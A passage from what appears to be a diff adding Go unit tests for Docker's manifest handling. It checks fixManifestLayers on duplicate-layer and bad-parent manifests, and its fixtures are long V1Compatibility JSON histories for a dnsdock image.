[\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + duplicateLayerManifestExpectedOutput := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + if err := fixManifestLayers(&duplicateLayerManifest); err != nil { + t.Fatalf("unexpected error from fixManifestLayers: %v", err) + } + + if !reflect.DeepEqual(duplicateLayerManifest, duplicateLayerManifestExpectedOutput) { + t.Fatal("incorrect output from fixManifestLayers on duplicate layer manifest") + } + + // Run fixManifestLayers again and confirm that it doesn't change the + // manifest (which no longer has duplicate layers). + if err := fixManifestLayers(&duplicateLayerManifest); err != nil { + t.Fatalf("unexpected error from fixManifestLayers: %v", err) + } + + if !reflect.DeepEqual(duplicateLayerManifest, duplicateLayerManifestExpectedOutput) { + t.Fatal("incorrect output from fixManifestLayers on duplicate layer manifest (second pass)") + } +} + +// TestFixManifestLayersBaseLayerParent makes sure that fixManifestLayers fails +// if the base layer configuration specifies a parent. +func TestFixManifestLayersBaseLayerParent(t *testing.T) { + // TODO Windows: Fix this unit text + if runtime.GOOS == "windows" { + t.Skip("Needs fixing on Windows") + } + duplicateLayerManifest := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"parent\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "invalid parent ID in the base layer of the image") { + t.Fatalf("expected an invalid parent ID error from fixManifestLayers") + } +} + +// TestFixManifestLayersBadParent makes sure that fixManifestLayers fails +// if an image configuration specifies a parent that doesn't directly follow +// that (deduplicated) image in the image history. +func TestFixManifestLayersBadParent(t *testing.T) { + duplicateLayerManifest := schema1.Manifest{ + FSLayers: []schema1.FSLayer{ + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + {BlobSum: digest.Digest("sha256:86e0e091d0da6bde2456dbb48306f3956bbeb2eae1b5b9a43045843f69fe4aaa")}, + }, + History: []schema1.History{ + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ac3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"3b38edc92eb7c074812e217b41a6ade66888531009d6286a6f5f36a06f9841b9\",\"parent\":\"ac3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:11.368300679Z\",\"container\":\"d91be3479d5b1e84b0c00d18eea9dc777ca0ad166d51174b24283e2e6f104253\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) ENTRYPOINT [\\\"/go/bin/dnsdock\\\"]\"],\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":null,\"Image\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":[\"/go/bin/dnsdock\"],\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n"}, + {V1Compatibility: "{\"id\":\"ec3025ca8cc9bcab039e193e20ec647c2da3c53a74020f2ba611601f9b2c6c02\",\"created\":\"2015-08-19T16:49:07.568027497Z\",\"container\":\"fe9e5a5264a843c9292d17b736c92dd19bdb49986a8782d7389964ddaff887cc\",\"container_config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"cd /go/src/github.com/tonistiigi/dnsdock \\u0026\\u0026 go get -v github.com/tools/godep \\u0026\\u0026 godep restore \\u0026\\u0026 go install -ldflags \\\"-X main.version `git describe --tags HEAD``if [[ -n $(command git status --porcelain --untracked-files=no 2\\u003e/dev/null) ]]; then echo \\\"-dirty\\\"; fi`\\\" ./...\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"docker_version\":\"1.6.2\",\"config\":{\"Hostname\":\"03797203757d\",\"Domainname\":\"\",\"User\":\"\",\"Memory\":0,\"MemorySwap\":0,\"CpuShares\":0,\"Cpuset\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/go/bin:/usr/src/go/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"GOLANG_VERSION=1.4.1\",\"GOPATH=/go\"],\"Cmd\":[\"/bin/bash\"],\"Image\":\"e3b0ff09e647595dafee15c54cd632c900df9e82b1d4d313b1e20639a1461779\",\"Volumes\":null,\"WorkingDir\":\"/go\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":[],\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":118430532}\n"}, + }, + } + + if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "Invalid parent ID.") { + t.Fatalf("expected an invalid parent ID error from fixManifestLayers") + } +} + +// TestValidateManifest verifies the validateManifest function +func TestValidateManifest(t *testing.T) { + // TODO Windows: Fix this unit text + if runtime.GOOS == "windows" { + t.Skip("Needs fixing on Windows") + } + expectedDigest, err := reference.ParseNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd") + if err != nil { + t.Fatal("could not parse reference") + } + expectedFSLayer0 := digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4") + + // Good manifest + + goodManifestBytes, err := ioutil.ReadFile("fixtures/validate_manifest/good_manifest") + if err != nil { + t.Fatal("error reading fixture:", err) + } + + var goodSignedManifest schema1.SignedManifest + err = json.Unmarshal(goodManifestBytes, &goodSignedManifest) + if err != nil { + t.Fatal("error unmarshaling manifest:", err) + } + 